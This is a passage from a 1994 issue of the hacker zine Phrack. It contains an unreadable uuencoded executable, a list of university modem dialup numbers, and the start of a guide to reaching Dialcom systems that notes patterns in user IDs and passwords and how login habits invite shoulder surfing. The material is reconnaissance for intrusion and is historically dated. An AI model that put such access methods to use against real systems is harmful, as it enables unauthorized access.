M`\4&Y@_PR=,C!G!G,=4-`F9J$.3Z=L4>X*3O'_#)?=7.L*[(Q=X#KS.:[U\\h
M//KX@=B&MW_HZ&SS!$-=.<!4OK[@8B(F/K:3[\/YO\U8,=&#*LF)X8T0OE*Bh
M`D;/"_8H^[H8!_&":,5AA1T1AH@@ZX]I)]BG]U,P:CE9>8[_[*MW+W^A]FQ`h
MWH#2+*[U(1GH^)`,KV`O8;+N!_!L-7X&SR(V7P?26G:!@,D:?+>%GC(A%ECSh
MRS+_D64@F_B80Q#:BL=0O('B441GDET_^KX4VFQ.3F.'YSD#4#:B'0''C6B@h
MTBE0\US)EX"6',B6)*\`XDB:I/_]3KQ")GM:QS\(?,Y_O88$OU=]]=W<6O4'h
MA<"AG#54J%/1\V:0$GPQEXOJ!!$?7'\14BK:Y\62C*`*_Z;XR1Q,3D0[@!'Gh
M!/YDO0<7>/\W@/AFW>`!DW![$,X;P@S/^/!1`F7PAX"?/+G"]V-IQ=W;AFW1h
M=KGN'PBX85-"6?6+Y\&^'CA7`'%`*HB#_!L=/HBY9YC4'V4/'#;%O.<=XBD\h
M^?3-1C?0#(>=?\!<0J_8BIS_T.0'.-O9O[OR"0.NIP_Y_K&FB\*!GQ4_^+Q_h
MV8`2W`:4=L`_^K>Y,#E=&5/KBN6U]Q1#_,2>=-*OH*1^6DK8`7PLX_72(36Sh
MTWUE\O7&(4D[X/6_$9$=)V?F20>$LBH\_0(W<7UGOD^;=M,FYX^H#X&):2[0h
M50*;@]EQ3'*P,^<"F>Z9G">R!-=W'REM+#7A"=Q9"2@MM2><5T3?'^UZ!M[3h
M.BC2_;WY]0PA$2XGT>P"`>@NJST@$D#[=0)CO_X.SH&/BY#4('(C+C7PB`]`h
M:"U@!O<6%]#Y@<&(?O$A^A,U!LWOWNY0LPLT?C!"8`G)D,^#ROP-;!XP&47Ih
M]F"$VS\(D:X6R-<CD,[]1O!M3O=(KSCZHP!TC_O;>@"'Q\S-\B(3:]/K2^R>h
M^^M7#OU((/UD@GY-T"^G!#=$"O1Z]0V2'+"BKWM$,P%I!FM](AFH/+U?CE!Dh
M%2DIMMR``!9D?:#7]5>CA2FLT%@FPAR0H9BOVP-5WMBP9_^C=0!RD_#1+(J=h
MX&@0$6&#-@NHX&Z01K&G.T`&S+/$9SJRPML@SH(!#,]'HRPXFH3P,H0W(3P,h
MX5T(+T(X'O5H%?D.M""(W9UO0)AU>1IA5ABZ_XS_5_2:&Z@/.O4PST4T2A"Wh
MZ`1"T16V84?]^@?%_;\^P?4MZT93[NB-*B:(B<EO1="J-'HK/<@%/@`_,`H4h
MWGW,`^S+P%Q#)7\?^RCBI%O.P9EQ<'M=`T21/%T,[,C[:B/]W57_COHQYOI7h
ML&3ZOP/OTO8>&Z+/O,=!GV[-GFB(!]GCQ$2T<#G$<!_%B1A;>J9U`QHI3OF-h
MZ2T*T!;)]G''"N'X;<>*X/AI27MBPYS]]RPR]`I[=%ZSP%[P1'Y"M:8'63O(h
M1=N:QGHZ")C_#=ASS';']PS`[%*8+\&L0`.FSQ(!)[?X_A,D>DWPCZ&$4*D2h
M@6G2\(,L;.2E9P:[=R\"=Q]JL#'XH47?@Q^V?R3WLW:]`1B^WHFZH):A1_>@h
M1UL@6C&^)N9RX;CD<GG;IH?"$C3)E)2`G#D"?Y>4S`,D.Z+9%^5240VLL9Y0h
M'6W9YD@GH)_'Y*N$NW:!'!3$4UW`NU'!QE+<$.+V?*NMN'4D^[J`(9S9@)BNh
MB'^*D$OZ%L>/NH<SJ48U%75`3P!HC@MH3:?$F$U._]OXCFY23X^C!S$C^+PAh
M;PN+HZ_V_8GO2[#[H;CN^+\GF2PI@N/+`N1SA,\T@&M3?#:F=&VGB_VOA]G3h
MS;=*@L)OCE7>\7".%=[Q<\;_W+,.LQYC'@_SC!QQH^LW0CZ"0<KAA8;KUCO,h
M5QJ'Z@%@OWN`3M5[E6=Y=.W\\H@QNV%_9+!/@L>`FO4]C+Y-<XA.=04_QZQ@h
MK,]6(V.%6/<"Z#--_*H`+WIBJ_Z`*(GZBL@S]/:/T$UIFR?2#AZ//IB)'1%Yh
M[N&P9(J^8'PZC:[KIJ@^DK>ILX#1O*X*ONN_+PFA!.Z-9>R-L%N,V9]A/E@Zh
MP/O:EJ;`'A\6#8-P?&?'LD;G$9G`<W\Y@,:1F-)DNH9-^OV"05('M_=*9"IOh
M>B9W/X-A;8_`M\0X6;7IC!Y2V<,H^^!)0/^_]<BMO=9=<4'$!":.'^09ED^Gh
MSA*DD2[>AX"X;KJP:(JA+NT%E.9T/C`#*MZ,]%7`[*ML`;(DOQ`>PA4-%2I%h
M7^*'9D$YCI\100M)/'UD`%,$J:9L5=\4Z8J0F(BBAXNG^N3X^K0^H\:-HK1.h
ML#HRZ.-^*>"<VC8VK6]Y>4I/?Z4]"YV1`@7F9VN"$_<R@G:]B9>I%8WN=.X7h
M@H$;LA%J9)V8WJWX2G^VS41V>MJ#88B.=GW"XT?_AMD-1!:E[0,#H!FU\2DNh
M,XJK9P2W8C^BP0T+IB\`9([(,$0)]D8A:@.S7&9J`U%FTI0HNPU.=QO)";X9h
MK\/8"G^+5I#H"M:YA-AC"4#:W"(6,,K@TA*(IK!)+MAL3([@\JDPX!.<YEX%h
M7!PJ#8B8VP.%C0K]@K/T_U.!>!V,1%]\\_]!1"G1UR^$/.6B:L1ZF-"!2.E_h
M-<]:SXS;+0N9Z"M!DTDXMJUP^QF`>_G;4-IM&.;HL].[YP3NI=(-8;L%L_'Mh
MH+Y?_,-L+V"V<PN:/M!8'M#`94`+>(G,FX:ZGD/6`H<)FDA))N3W=`W_CRX#h
M6^EV`!NG=DXYR]EH:6>C$9P-[L++$6VCV^NJ/L037YL6QY'*]17!17ZU);K;h
MYO].=AV28-(!GZ@>C8%BZP2-0S-DE96?]H?O_YWBDV:DE8/R`[E'9V`L)A$*h
M>_1?`1`MS$PV5@L@:=I$YIYJ7\Q99KN^4K8!JG0BM:GG3+G'L4[V[OXB!]V@h
M5JC^U_J['!3/9+%O$39),*[M.J)M2QW&#6/9"Y3-I,PO&$_B*,6EL%]/H'L\h
MW7Z^7SJK*4@#(IZ9>95U'U@&_]$8K!9'"DG/TBT'9R,9.>9A\JU!?,Z_,'/,h
MMFE.S[8R*+G+6<8"'#U<\`.*?2#RP>EA+LYOY%URIG7PA_N1?O]=(6<B]`>.h
MQ0(\[MNF0,5.3,DA>0RYF>O`L-LS;"E`P)W;9+M#$#",#JYKH8!B/=I.'#>6h
MDRI)&_N8:DP%]IW!ZV[3)\),U>T[/0*S`5K3`!.N5WF/\TKS=)&PL80Y78TSh
MDR^.QO9"7H#E+KE>`8]PAP,>[!.M(LR+8GV+^=?;4(16861\`>.F37A*$B)!h
M*<.8M*_'EES`W2D"REPAK:*ES9\"H.Z?#H(K;UKF?T2KH!!C&B83S@%T\`-"h
M4!&'FF[?8(\%O,R.V@']3Z#%Q9"GW:/_N1*J4V6_'QQ@`('CH0'F3S_Z_21;h
M6,3*9R?<];1]B$?W$=>CL[\?1AL@D>;M"T-R'O1.^0.UA_1`Y+TZ@+4-[!S.h
M'5,/>%SC\K2!D)_^-X!\.=OF'Q*7GX74;GS7_BFH%E"R]#/`7"36Q$S?S]X(h
MDJ;]`SG5]`J?\G\-D)=TVX335)R8GCE:2$@9R'.$Z$D#J'@CJ#K2*\L5<0-4h
M*^!P8G*"M'E0V<"^N_M)W+`PG!(X1:)<H9%RIF>7JTW<JIPLJ`L>X+4=</(`h
M<&D`N%SNKRYKW1Y`QJ"TS.0EQEU@;`A/.P*=8>R#^'RN($PTQO3%_2N@4D([h
MXD=,B$:&>"(?H1RZEL<:^LA@0!Y5GZW;`H7H/-Q@/L]3M#.!1=G'AT&`9<"Oh
M-;!/LP*M6QL4MX@&O>M8W[BD<^8J?1_B\L=OQ+[NMWJ%]):_Z%)'/KXD+;[Fh
MJ0#&VMY.D+5.8I,V#R)^H%DPM9EUP:/BU_54%_[5"T>Y_>#\`4AX8Y_N^O7Fh
MF!;!'X/E\_O"01B>(8&42QVVPO4LTEC'#!H?M@5#53O3=#_@@?H=B4#,#:;Th
M!V$W(,O76R)62M&R6*_W#2#-'$&:\0-HMLW]:#LNP^``]`+4-]"7LOV;EVDWh
M2+O'@S-NR1!+^;&:D3F=M5E\9%(J62W?=5VEZ*T#[(D:H%TD2U3NNLQ\CYH9h
M[:\;D(Q=_&)J[5L\H.ZLR.P,=^ZS:]7BZ:,GL>F+*:OF5-DS`E0U=*!D"6+Th
M#JH7=VFOM[K>*&[^_]'W3@]U:A1(?:7R\1#JLMM5N0U\Q/[R[`:S;L52]<,$h
MLA6!>\`3O>`$9&A\(+Y"Z_"=XWH#L>HK<L/2BNK3<V4WE+64J-#N=?7L"%^!h
M$#Y);H-Q<$+3"A=K"YI\%C1/#C!K:/<`=Q*?:W`EL8WX_W!#>KV^(YI3OG!;h
M;?I3?R$+?76WCU7LHWD*-(TK%4<_Q[`OP'[F]22!DK`@RGXT4(&6C]V<2,'&h
M"'#W9U@GMDE$<9T@8^R.@0F@_N54>'KG`(/2U4=;)GF[GW.XWQ7(OY6(C@2;h
MKE`DC/P<$#GT@?!;-3O-@<(@:'LQS7(^>G/?1?&!^1,S*?/!D2:JF;:\O^5^h
M><;:&4??&<WB;Y*Q1R8;YS^E8)/&#4H5,(7NGFX)^8ZFP-[?U=KK:ES<U=!'h
M$931"3K&OIZB2?\.]*LQI37CZSN/2>V./2+)ZYOK>7VU@2\W<7RG,=289$"@h
M0#&C]R(;[K^)`#\'B.N6G3I=GVG>C#J8T9L<550DP7SHH.3#(/\B5-8!*?:Dh
M08/J_O_7Y$Z+3@50M*.KBQ`>?*!QN16.JO2_+WVDL`XQ>@9.'(%RVEXN_ZS#h
MI49%WT'K"$1XY8,_4)X1*:)>;'WE=:6)J_K'FE7K\*E09TKW*%4JE)SO4`U^h
M1/\0P(@6C/!'K5M0[872AP,X`\N)]FK7Q?D;*8!:*!)M))@Q^BR/]<EU$.PVh
M,0-$HN9WWM.13F2B.P.?-5"`7N?:H(,']J?=ZC5T*2<&PBK_$:;WX.$/HV^/h
M/7#Z>MI(+L?3[S1(I<C3EV1P3W1\HJ,-K@]4/E7Z,Z#B.8`4&C*:K"M/XN5Sh
MUCZ0H]R<BZ<[#M9V4Y_3HY"N-Q$UC[XN6*@]X<#LH7/Y5J#GM)7@MDC;UELXh
M7_(AA7.TV-7%UWI/%Q&TU"[0;#"^'SUII,D*[C3(^ER:16+(MF>>N0TWH_3Wh
M\TQ(]SZ4@U$3YKEBHA1]SKL?6<*4NS'Z^.C2%R^S[UB&A>XG7A\PP$HJC87]h
M2:W0(%CJMRIM<I;7PR<06)2A:M^(@_=E$#/@+0K'4;MD=G8`%PV)8"R;8Q7Zh
MOR@@YNMQ3''TZ6(2<P3>@*)/D*YZXP4!A-#JH>'/3Y.,U-Q=1=H@W?3_YC2>h
MK6KP$_@(501_=A#@+6B9^5#LH$L6S6`L\*\!AJ%],K2)M06CIJN8B+V5O;O&h
MN@4I=09CE9%'!S\PV/`%>C?KV0,F:_`=OPNF&\7>5F,)5CW$1XNG;C!"QTCKh
MDAY`].W;11NY?2QQ#U*V4RHQ.>$8PG;=!83O;:X-P/^#68:9C:X=NSX4@-L/h
M$&\]=9&+O0=>AS??Q_/*8E-L.#*5=VF?X.K3J\L!9)*=O?T#?QZ!3:)/[JL=h
MJ9$.Q6M5XK68M3V=-CZR35$+6T.EQ4MT#+N@N[`G`,`$9SKA`*OCF4IW>TX7h
M8$:^47N`/1W1*X(H"48I;*:^!/FZ0_H<6)[OV+\%<_QOEXLH:&VD=WMK<WAKh
M+T_:;)P);^]:C5T+TO)B`GIX0"^/2]0RQ;3_A<B':;V;P&SSZ_OK#T)"U@?@h
M'^E\5U>:VL>KW_H+RKCDJXZST@207;3_S%*A')&:^0]H\.EEA1%<Z24_/0EBh
M+PG4?+::;I4N\R=KKZ[=A"W(=`M`=.T`FD??7`"QDQVXXP/WE3L*8A+JQ017h
M#/@#3*)[=2=S:3+&\G8?='<ZX-%%'UX.C'F9\ULAF)<_7R_PZ3JB)DCTXOW\h
M\G^U&/P$O-5<$`S#N8#2>75Z5=ISL/@K6."-<@QRVID_*6&<X7IU5_O`8UF?h
M(JY4G'T.TL'GL"-K'QZPH%/<%H>D%_H(@#W:>G5D<<ZO+/6^!RQ5T^O8/7G#h
M+G8/R!54GR/CM1?UL'8?+7CC]/0&`^R9K9[M^T`Z,6JO]()$%9#S26MD1]<Ch
M[Y&7!SV:D^>=&\#MZ9OO%:<Q1-%72D^/+#`E(:^NMNCT>/]#>C:T:U(-H;^Dh
M=..<[?UU>LL`(97-!UB2RA,;7<=P\:GH,YV0CN`)FN()2J+KY0^@2O$1I=!$h
M?WE'(7=>.TJ@Q]$$.">=Y5_N#/+BPZH#Q(WX/3,`;&O+ZQ1JGP'MB,PBY/HBh
MY/S^"-F(C6ENQ('1_1LO:E#(IWKB(L(UX2)^^(^UX>T&#JC['(;M[O#_-T'5h
M%Q``+^[X3R-^H`'V*SJP#C1W@QD)B_VU@J#-Y0ME?^5CS'^R`HZ=`GX^)^]`h
M#^=5"+NEZOO;2HFA@B4!W'"V"[P??Y)PJ?#I!&&@XG8%$CRI>K'PA</KBO/Dh
MG[(V1/9$_S<F&H!A+5<^%I%/M4)ZZLQ_FJ[`)/$C)<9N,:=K.4FHH@.]\NY1h
MNB817*,57#<R3?(,PAIY=O?VB[&19<8F<<>A;">609O#\VP!Z^C87NIUZ7$[h
M_/MF%4;2@/V^^8'1Y33$Q+][@,9TAPG:N;6&WO(36.#:9(&1YEORS(4CV$IVh
M6/425%-G&KD0C:WCM*EC1^8L43_@F,7A://HJ5><#/`0F@PBAB;#+9D+4_YIh
MWB&Z$90!&QF497@$3D8N<+*\Q,;\1JL*BB=0O`&ALS+^=4M8-(!@=-.I(*76h
M==N2:MJV94$R32M6;EBY>4&V!#GT+=R\<M.>14L7),JQ*4'&S(DS)TN03=..h
ME?MV[ELSTW4O%RZ$?A;Y#>]6@--PP8`#L*CO'/K5:%*F1;\F=6KTR3E@4P08h
M.'#@@`&V@04WE0^)AH8B9[60<L?8,"%#A@PBX18M_I?84`)CE>T%AN5H7``Rh
M*6#*).$!SR2!,0.^(!A`@,J^"#B#8``+*DDD2K=UV;)-88ROT+Q'N`,+PICFh
M:2`8P\;1$@@6>)#A)BR*QW`?TKK#>=SMQG0)$Z28VQUI6KIMP[H%F91N6#:6h
M6F$^A94NJA-DR;D@>29U"[>.^6;3LBWK@SG2F$XS<LOB3+9L%Y?J<@$6E>,Yh
MRWF?+AK$/LT[2CG_W;X1VZ0^+1GS[Y3#OD$:80ZN''8,V.8-?@Y8TV&LLD?#h
M6H,L4V3?VK7GGNK0ZOZ29(9]+DL%Q:S9^^YH!\'Z+L,R#P1E*W80^Q*</5>Qh
M)I1CC#9%NE53Q8D[`*/-CX/XFE8I=D<S+;8'-TOVNVB^K"A1JM#WE2M3>NT)h
M$V])O"E#&#M,F"G:2;EE%LYRW:(4\\S[#)N9=Y-G@UO+DA&"S=FB=8XT1.O/h
MTXFO?=2GC^2EVF!ZF`T5=%YL]K%KLKC=LG+-LGU[)WJ``[;YC&T).OW/8`^2h
M;%J[::9HL&_R5@`&SG.`BQBU#/%U;K6CAW-TXIM](R=WTQX3=N,I]=?N_`$0h
MFVTL1U:<CJQH&30H"-$RHE4&T7*WO='=G@4)]PW<-C6+MK<G@^\!S'F,M=ECh
MFS@5E8>=.X>5$QM+J/\'4$L!`@H!"@````8`4K>9:;N-E4+('0``_2T```L`h
M`````````````````````$U38W)Y<'0N97AE4$L%!@`````!``$`.0```/$=h
$``````#!h
`h
end
-=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=-
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 13 of 28
****************************************************************************
The Phrack University Dialup List
[We've been compiling all these for months now, and still have
hundreds more to add. If you know dialups for any other .EDU
sites or Universities elsewhere in the world that are on
the Internet, please mail them to us at phrack@well.com.
Please, Universities ONLY...this is a list to assist students. :) ]
-----------------------------------------------------------------------------
201-529-6731 RAMAPO.EDU
201-596-3500 NJIT.EDU
201-648-1010 RUTGERS.EDU
203-432-9642 YALE.EDU
205-895-6792 UAH.EDU
206-296-6250 SEATTLEU.EDU
206-552-5996 WASHINGTON.EDU
685-7724
7796
209-278-7366 CSUFRESNO.EDU
209-632-7522 CALSTATE.EDU
209-474-5784 CSUSTAN.EDU
523-2173
667-3130
723-2810
210-381-3681 PANAM.EDU
3590
210-982-0289 UTB.EDU
212-206-1571 NEWSCHOOL.EDU
229-5326
212-854-1812 COLUMBIA.EDU
1824
1896
3726
9924
212-995-3600 NYU.EDU
4343
213-225-6028 CALSTATELA.EDU
213-259-2732 OXY.EDU
213-740-9500 USC.EDU
214-368-1721 SMU.EDU
3131
215-359-5071 DCCC.EDU
215-436-2199 WCUPA.EDU
6935
215-489-0351 URSINIUS.EDU
215-572-5784 BEAVER.EDU
215-641-6436 MC3.EDU
215-204-1010 TEMPLE.EDU
9630
9638
215-889-1336 PSU.EDU
215-895-1600 DREXEL.EDU
5896
215-896-1318 HAVERFORD.EDU
1824
215-898-8670 UPENN.EDU
6184
0834
3157
216-368-8888 CWRU.EDU
217-333-4000 UIUC.EDU
3700
244-5109
4976
255-9000
219-237-4116 INDIANA.EDU
4117
4186
4187
4190
4413
4415
262-1082
481-6905
980-6553
6556
6866
6869
219-989-2900 PURDUE.EDU
301-403-4444 UMD.EDU
303-270-4865 COLORADO.EDU
447-1564
492-0346
1900
1949
1953
1968
1998
938-1283
303-458-3588 REGIS.EDU
303-556-4982 MSCD.EDU
623-0763
0774
892-1014
303-698-0515 DU.EDU
871-3319
3324
4770
309-438-8070 ILSTU.EDU
8200
309-677-3250 BRADLEY.EDU
310-769-1892 CALSTATE.EDU
310-985-9540 CSULB.EDU
312-362-1061 DEPAUL.EDU
312-413-3200 UIC.EDU
3212
312-753-0975 UCHICAGO.EDU
313-764-4800 MERIT.EDU
258-6811
313-487-4451 EMICH.EDU
314-883-7000 MISSOURI.EDU
315-443-1320 SYR.EDU
1330
3396
1045
317-285-1000 BSU.EDU
1003
1005
1019
1048
1064
1068
1070
1076
1077
1087
1088
1089
1090
1099
1107
1108
317-494-6106 PURDUE.EDU
496-2000
317-455-2426 INDIANA.EDU
973-8265
318-261-9662 USL.EDU
9674
319-335-6200 UIOWA.EDU
402-280-2119 CREIGHTON.EDU
404-727-8644 EMORY.EDU
404-894-2191 GATECH.EDU
2193
2195
407-722-2202 FIT.EDU
407-823-2020 UCF.EDU
407-835-4488 PBAC.EDU
408-425-8930 UCSC.EDU
408-554-5050 SCU.EDU
9652
408-924-1054 CALSTATE.EDU
409-294-1965 SHSU.EDU
409-568-6028 SFASU.EDU
410-329-3281 UMD.EDU
744-8000
333-7447
410-516-4620 JHU.EDU
5350
410-788-7854 UMBC.EDU
410-837-5750 UBALT.EDU
412-396-5101 DUQ.EDU
412-578-9896 CMU.EDU
268-6901
856-0815
412-621-5954 PITT.EDU
2582
3655
3720
8072
836-7123
9997
412-938-4063 CUP.EDU
413-538-2345 MTHOLYOKE.EDU
413-545-0755 UMASS.EDU
3161
3050
3056
5345
3100
3780
413-585-3769 SMITH.EDU
413-597-3107 WILLIAMS.EDU
415-333-1077 CALSTATE.EDU
415-338-1200 SFSU.EDU
2400
415-380-0000 STANFORD.EDU
416-492-0239 TORONTO.EDU
501-575-3150 UARK.EDU
3506
7254
7266
8690
502-588-7027 LOUISVILLE.EDU
6020
8999
503-245-5511 PCC.EDU
503-346-5975 UOREGON.EDU
2150
3536
503-370-2500 WILLAMETTE.EDU
503-725-3100 PDX.EDU
3144
3201
5220
5401
503-737-1513 ORST.EDU
1517
1560
1569
503-777-7757 REED.EDU
504-286-7300 UNO.EDU
504-334-1024 LSU.EDU
505-277-9990 UNM.EDU
5950
6390
505-646-4942 NMSU.EDU
508-798-0166 WPI.EDU
509-375-9326 WSU.EDU
510-643-9600 BERKELEY.EDU
510-727-1841 CSUHAYWARD.EDU
512-245-2631 SWT.EDU
512-471-9420 UTEXAS.EDU
475-9996
513-327-6188 WITTENBERG.EDU
513-556-7000 UC.EDU
517-336-3200 MSU.EDU
351-9640
518-276-2856 RPI.EDU
8898
8400
2857
2858
8990
518-435-4110 ALBANY.EDU
4160
519-725-5100 WATERLOO.EDU
601-325-4060 MSSTATE.EDU
2830
8348
602-435-3444 MARICOPA.EDU
602-965-7860 ASU.EDU
603-643-6300 DARTMOUTH.EDU
604-753-3245 MALPITA.EDU
606-622-2340 EKU.EDU
606-257-1232 UKY.EDU
1353
1361
1474
2836
4244
5627
258-1996
2400
1200
323-1996
2400
2700
609-258-2630 PRINCETON.EDU
609-896-3959 RIDER.EDU
610-683-3692 KUTZTOWN.EDU
612-626-1920 UMN.EDU
2460
9600
614-292-3103 OHIO-STATE.EDU
3112
3124
3196
614-593-9124 OHIOU.EDU
615-322-3551 VANDERBILT.EDU
3556
343-0446
1524
615-372-3900 TNTECH.EDU
615-974-3201 UTK.EDU
4282
6711
6741
6811
8131
616-394-7120 HOPE.EDU
617-258-7111 MIT.EDU
257-6222
617-287-4000 UMB.EDU
265-8503
617-353-3500 BU.EDU
4596
9118
9415
9600
617-373-8660 NEU.EDU
617-437-8668 NORTHEASTERN.EDU
617-495-7111 HARVARD.EDU
617-727-5920 MASS.EDU
619-292-7514 UCSD.EDU
436-7148
452-4390
4398
8280
8238
9367
453-9366
480-0651
534-5890
6900
6908
558-7047
7080
9097
619-594-7700 SDSU.EDU
619-752-7964 CSUSM.EDU
702-895-3955 UNLV.EDU
703-831-5393 RUNET.EDU
703-993-3536 GMU.EDU
707-664-8093 CALSTATE.EDU
822-6205
707-826-4621 HUMBOLDT.EDU
708-467-1500 NWU.EDU
713-749-7700 UH.EDU
7741
7751
714-364-9496 CALSTATE.EDU
714-773-3111 FULLERTON.EDU
526-0334
714-856-8960 UCI.EDU
716-273-2400 ROCHESTER.EDU
716-645-6128 BUFFALO.EDU
719-594-9850 UCCS.EDU
535-0044
801-581-5650 UTAH.EDU
8105
585-4357
5550
803-656-1700 CLEMSON.EDU
804-594-7563 CNU.EDU
804-924-0577 VIRGINIA.EDU
982-5084
805-549-9721 CALSTATE.EDU
643-6386
805-664-0551 CSUBAK.EDU
805-756-7025 CALPOLY.EDU
805-893-8400 UCSB.EDU
806-742-1824 TTU.EDU
808-946-0722 HAWAII.EDU
956-2294
810-939-3370 UMICH.EDU
812-855-4211 INDIANA.EDU
4212
9656
9681
944-8725
9820
945-6114
814-269-7950 PITT.EDU
7970
362-7597
7558
827-4486
814-863-0459 PSU.EDU
4820
9600
865-2424
816-235-1491 UMKC.EDU
1492
1493
6020
818-701-0478 CSUN.EDU
901-678-2834 MEMST.EDU
904-392-5533 UFL.EDU
904-646-2772 UNF.EDU
2735
906-487-1530 MTU.EDU
907-474-0772 ALASKA.EDU
789-1314
908-571-3555 MONMOUTH.EDU
908-932-4333 RUTGERS.EDU
909-595-3779 CSUPOMONA.EDU
909-595-5993 CALPOLY.EDU
598-7104
909-621-8233 HMC.EDU
909-621-8455 POMONA.EDU
8332
909-621-8361 CLAREMONT.EDU
8313
8108
8509
909-880-8833 CSUSB.EDU
913-864-5310 UKANS.EDU
897-8650
916-456-1441 CSUS.EDU
737-0955
916-752-7900 UCDAVIS.EDU
7920
7950
916-894-3033 CSUCHICO.EDU
919-681-4900 DUKE.EDU
919-759-5814 WFU.EDU
919-962-9911 UNC.EDU
-----------------------------------------------------------------------------
Canada
204-275-6100 umanitoba.ca
6132
6150
306-586-5550 University of Regina
306-933-9400 University of Saskatchewan
403-492-0024 University of Alberta
0096
3214
416-978-3959 University of Toronto
8171
418-545-6010 Universite du Quebec a Chicoutimi
418-656-7700 laval u
3131
5523
506-453-4551 University of New Brunswick
4560
4609
452-6393
514-285-6401 uquebec.ca
514-340-4449 polymtl.ca
4450
4951
343-2411
514-398-8111 McGill University
8211
8711
514-733-2394 Universite de Montreal
1271
0832
514-343-2411
7835
514-848-8800 concordia.ca
7494
8828
4585
8834
7370
519-661-3511 University of Western Ontario
3512
3513
519-252-1101 Windsor University
519-725-5100 University of Waterloo
1392
604-291-4700 simon fraser u
4721
5947
604-721-2839 univ of victoria
6148
604-822-9600 University of British Columbia
613-788-3900 Carleton University
564-5600
613-548-8258 Queen's University
545-0383
613-564-3225 University of Ottawa
5926
613-230-1439 York University
705-741-3350 Trent University
3351
4637
709-737-8302 Memorial Univ. of Newfoundland
807-346-7770 Lakehead University
819-569-9041 usherb.ca
821-8025
819-822-9723 bishop u
819-595-2028 Universite du Quebec a Hull
902-542-1585 acadiau.edu
902-425-0800 tuns.ca
420-7945
902-429-8270 Saint Mary's University
902-494-2500 Dalhousie University
8000
902-566-0354 University of Prince Edward Island
905-570-1889 McMaster University
1046
-----------------------------------------------------------------------------
The Rest of the World
31-40-435049 tue.nl
455215
430032
34-1-582-1941 Facultad de Odontologia
3-333-9954 Barcelona Polytechnic
8991 Univ of Barcelona
581-2091
691-5881 Polytechnic University
34-7-656-6553 Univ of Zaragosa
0108
6654
44-3-34-2755 st-andrews.ac.uk
44-71-413-0790 birkbeck college
44-524-843878 lancashire
44-785-214479 staffs.ac.uk
49-621-292-1020 uni-mannheim.de
121-0251
49-631-205-2150 uni-kl.de
3554
3629
3630
49-8421-5665 ku-eichstett.de
49-8452-70035 tu-muenchen.de
61-8-223-2657 Univ of Adelaide
61-9-351-9544 Curtin U
61-9-381-1630 uwa.edu.au
2200
3054
82-2-962 kaist.ac.kr
886-2-363-9529 NAT TECH U, TAIWAN
==Phrack Magazine==
Volume Five, Issue Forty-Six, File 14 of 28
****************************************************************************
A L I T T L E A B O U T D I A L C O M
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
by
Herd Beast
(hbeast@phantom.com)
Introduction
~~~~~~~~~~~
Dialcom is an interesting system for hackers for two reasons:
First, it is used by business people, reporters and many other world
wide, and it offers a variety of information services, from a
bulletin board to stock market updates and news services. Second,
Dialcom runs on Prime machines, so using Dialcom is a good way to
learn Prime. True, it's not the best, as access is generally restricted,
but it's better than, say, learning VMS from Information America.
In these days, where everyone seems to be so centered about the
Internet and the latest Unix holes, it's important to remember that the
information super-highway is not quite here, and many interesting things
are out there and not on the Internet. Phrack has always been a good place
to find out more about these things and places, and I wrote this article
after reading the Dialog articles in Phrack.
Well, gentle reader, I guess that my meaning-of-life crap quota is full,
so let's move on.
Accessing Dialcom and Logging In
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Dialcom is accessible world-wide. It offers connection to Tymnet, Sprintnet,
and other networks as well as dialin modems. Since I am not writing to
Washington people only, I will specify only the easiest methods -- Tymnet
and Sprintnet -- and some of the more interesting access methods.
Dialcom is basically a Primecom network. Each user has an account on
one or more of the systems connected to that network. To access Dialcom,
the user needs to access the machine his account is on. First, he logs
into a public data network and follows the steps required to connect to
a remote note. On Tymnet, this means getting to the "please log in:"
prompt, and on Sprintnet it's the famous '@' prompt.
For Tymnet, you must enter at the prompt: DIALCOM;<system number>
(eg, DIALCOM;57). The same goes for TYMUSA connection from outside
the USA.
For Sprintnet or other PADs, you must enter the correct NUA:
System # Sprintnet NUA Tymnet NUA
======== ============= =============
XX 3110 301003XX 3106 004551XX
(32, 34,
41 - 46,
50, 52,
57, 61,
63, 64)
It should be noted that Dialcom keeps its own X.25 network, Dialnet,
and the NUAs on it are those of the systems (connect to address "57"
for system 57).
Dialcom has other access methods, meant to be used from outside the
USA, but sometimes available from within as well.
One is a COMCO card, which is inserted into a reader connected to the
computer and the modem through a serial link. The user then calls a
special dial-up number, and can connect to Dialcom (or any other NUA).
The card contains a number of "tax units" which are deducted as the
connection goes through, until they are exhausted and the card is useless.
The user calls the dial-up and types in ".<CR>". The amount of tax units
on the card will then appear on the screen, and the user can connect to a
host. COMCO dial-ups:
Location Number
======================= ==============
Australia +61-02-2813511
Belgium +32-02-5141710
France +33-1-40264075
West Germany +49-069-290255
Hong Kong +852-5-8611655
Netherlands +31-020-6624661
Switzerland +41-022-865507
United Kingdom +45-01-4077077
USA (Toll Free) +1-800-777-4445
USA +1-212-747-9051
The other way is through Infonet. I will not turn this into an Infonet
guide, save to write the logon sequence needed to access Dialcom.
At the '#' prompt, enter 'C'. At the "Center:" prompt, enter "DC".
Dialcom NUAs are 31370093060XX, where XX is the system number.
Once the connection to a Dialcom system has been established, you will
be greeted by the Prime header:
Primecom Network 19.4Q.111 System 666
Please Sign On
>
And the '>' prompt. This is a limited prompt as most commands cannot
be issued at it, so you need to login.
Dialcom user id's are typically 3 alphabetic characters followed by
several digits. The password may contain any character except for
",;/*" or spaces, and my experience shows that they tend to be of
intermediate complexity (most will not be found in a dictionary, but
could be cracked).
Password security may become useless at this point, because the Dialcom
Prime systems allow ID to take both user id and password as arguments
(which some other Primes do not) and in fact, Dialcom tutorials tell
users to log on like this --
>ID HBT007 IMEL8
-- which makes ``shoulder surfing'' easier.
One you log on, you will see:
Dialcom Computer Services 19.4Q.111(666)
On At 14:44 07/32/94 EDT
Last On At 4:09 06/44/94 EDT
>
And again, the '>' prompt.
>off
Off At 14:45 07/32/94 EDT
Time used: 00h 00m connect, 00m 01s CPU, 00m 00s I/O.
Security at Dialcom
~~~~~~~~~~~~~~~~~~
As mentioned, while passwords are relatively secure, the manner in
which they are entered is usually not.
As for the accounts themselves, it's important to understand the
general way accounts exist on Dialcom. Dialcom users are usually
part of a business that has an ``account group'' on Dialcom. Each
user gets an account from that group (HBT027, HBT054). Each group
also has a group administrator, who controls what each account can
access. The administrator determines which programs (provided by Dialcom)
